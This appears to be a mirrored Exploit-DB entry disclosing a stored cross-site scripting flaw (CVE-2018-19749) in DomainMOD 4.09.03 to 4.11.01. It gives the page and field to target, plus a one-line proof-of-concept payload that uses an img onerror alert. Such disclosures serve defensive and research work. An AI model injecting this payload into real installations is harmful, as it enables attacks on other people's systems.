bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/45941.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

18 lines
No EOL
743 B
Text
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting
# Date: 2018-11-22
# Exploit Author: Mohammed Abdul Raheem
# Vendor Homepage: domainmod (https://domainmod.org/)
# Software Link: domainmod (https://github.com/domainmod/domainmod)
# Version: v4.09.03 to v4.11.01
# CVE : CVE-2018-19749
# A Stored Cross-site scripting (XSS) was discovered in DomainMod application
# versions from v4.09.03 to v4.11.01https://github.com/domainmod/domainmod/issues/81
After logging into the Domainmod application panel, browse to the
assets/add/account-owner.php page and inject a javascript XSS payload
in owner name field
"><img src=x onerror=alert("Xss-By-Abdul-Raheem")>
#POC : attached here https://github.com/domainmod/domainmod/issues/81
Reference in a new issue View git blame Copy permalink